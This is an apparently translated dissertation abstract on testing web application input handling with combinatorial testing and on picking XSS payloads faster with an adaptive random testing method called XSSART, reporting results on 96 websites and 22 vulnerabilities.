Input Function Testing And XSS Vulnerability Detection For WEB Applications

WEB applications are one of the most popular software in the world,but the high profile web application failures and vulnerabilities indicate that developers have not tested such programs adequately.If the server program does not fully verify the legit-imacy of the user input,it may cause system failures or even a security risk,such as XSS vulnerability.Many black-box testing tools may collect a large number of Pay-loads and traverse them to find a Payload that can be successfully injected to detect XSS vulnerability.Although it is not very efficient,previous research has paid less attention to how to find XSS vulnerabilities in WEB applications with fewer Payloads.These failures and vulnerabilities not only affects the user experience,but also brings great security problems.In this dissertation,we propose some reasonable test methods for such problems.The main work is as follows:(1)Generate test cases with the method of combinatorial testing to test the input function of interacting with the server in a WEB application,where each test case is a string of special characters.For test cases that can cause server errors,we used the method of fault location based on combinatorial testing to find the combinations of characters that can cause server errors.We developed WEBCT,a prototype tool to test WEB application input function.We test 96 websites,including schools,government and institutional websites with WEBCT,and find that 23 of them have problems with the input function.When a user submits some special strings to the server,it would cause a server error response.We analyze the results of fault location and find that 56%of server errors are caused by the combinations of "%","<",""',"\" and other characters.(2)Apply the adaptive random test method to XSS vulnerability detection and pro-pose a Payloads selection method XSSART.The method is based on a observation that effective Payloads tend to cluster togethe.Therefore,after a Payload fails to be injected,XSSART measures the distance between the failed Payload and other Payloads,and se-lects the next Payload that is most likely to be injected successfully to find vulnerability more quickly.We used a total of 22 XSS vulnerabilities in 3 open source web appli-cations and 1 actual web application to evaluate Payloads selection method XSSART.The experiment results indicate that that XSSART method can effectively improve the Fuzzing method by more than 27.2%in reducing the number of attempts before accom-plishing a successful injection.